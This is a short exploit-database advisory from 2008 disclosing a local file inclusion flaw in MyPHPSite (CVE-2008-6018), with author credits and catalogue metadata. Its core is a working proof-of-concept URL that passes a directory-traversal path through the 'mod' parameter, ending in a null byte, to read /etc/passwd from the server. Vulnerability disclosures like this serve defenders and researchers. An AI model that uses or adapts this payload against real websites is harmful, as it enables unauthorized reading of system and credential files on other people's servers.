MyPHPsite - Local File Inclusion
Author: Piker
type: webapps
platform: php
port:
date_added: 2008-12-17
date_updated: 2017-01-05
verified: 1
codes: OSVDB-50839;CVE-2008-6018
tags:
aliases:
screenshot_url:
application_url:
################## Piker #######################################
#
#
# MyPHPSite Local File Inclusion Vulnerability
#
#
# Affected software: MyPHPSite
# Vendor: www.myphpsite.org
# Risk: Medium
#
################################################################
#
# http://[target]/[path]/index.php?mod=[LFI]%00
#
# PoC: http://[target]/[path]/index.php?mod=../../../../../../etc/passwd%00
#
################################################################
#
# Found by Piker [piker0x90(at)gmail(dot)com]
# D.O.M Labs - Security Researchers
# www.domlabs.org
#
#
################################################################
# milw0rm.com [2008-12-18]